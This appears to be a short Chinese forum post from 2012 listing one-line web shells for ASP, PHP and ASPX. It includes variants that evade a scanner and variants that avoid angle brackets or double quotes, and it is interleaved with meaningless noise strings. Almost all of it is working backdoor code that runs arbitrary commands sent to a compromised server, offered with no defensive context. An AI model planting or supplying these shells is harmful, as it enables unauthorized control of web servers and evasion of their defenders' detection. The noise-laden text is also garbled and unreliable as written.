asp一句话 <%execute(request("1"))%>
* q6 E. s: P* j" O4 A2 m" c+ g
3 I- ^% J' u# N. V2 B' mphp一句话 <?php eval($_POST[1]);?> 4 b2 Q0 q7 h. l6 X- s' L
+ m- R: |4 }. b: h5 ]) A- m! Haspx一句话
% |+ O4 k' x9 c/ c. |2 |/ \; v- h$ {. e$ r9 w, P6 r. s: i9 S
<script language="C#" runat="server">3 O* p, `# ^3 Z+ K# c2 }2 y3 V3 ^$ i
( P$ n* J6 t3 i7 Z& j- Q4 O4 d
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y ("add6bb58e139be10");' j+ H2 k& d- T0 ^/ Q
+ J* N4 `9 i- r( \9 d0 a
</script>! @8 ^: R& h: x ]- Q' P- ]+ F
: N1 e7 ^! b; P S5 d可以躲过雷客图的一句话。
u+ F3 y$ M8 F" s) |, h& f
6 i3 `, i k9 r" t <%
6 I8 a' N$ m' o1 [ e: q- @+ o+ r! D; U& d
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
/ M" P$ x8 T0 L& v f$ q
; {8 |. ~, _0 [$ E7 W ms.Language="VBScript"( j' N; \& k* n
2 s! x) c% R5 V" F7 |! o ms.AddObject "Response", Response! ?5 r0 H: e: g
! }4 f2 J- | I4 \+ X2 `) c& E ms.AddObject "request", request
; E7 d% r5 ^5 n2 Y
4 R Z8 Q0 @( ~- o5 [& a- ]3 K ms.ExecuteStatement("ev"&"al(request(""1""))"); i$ n, T) C6 i' C" g) ^
4 I O; V% \+ t( y
%>2 {4 X6 n: s/ V
1 Z( A( R# ^6 {( m5 j$ L7 y* f3 V
不用'<,>'的asp一句话% k# x/ c, a# H8 g6 s5 {1 Y* U
2 Y) g0 e: x0 e( U! { d0 \ <script language=VBScript runat=server>execute request("1")</script>5 I1 r$ m, K# O3 n+ J/ M! N; n
/ T; S! c! m9 q4 v! w+ Y- v4 c 不用双引号的一句话。% S8 |- M" ^" l2 s; M6 V2 x
9 g2 @0 z# \0 ^. I' h# A6 V5 F <%eval request(chr(35))%>
3 u- [6 o# ~. E. u4 x |
发表于 2012-9-23 14:36:09
收藏
支持
反对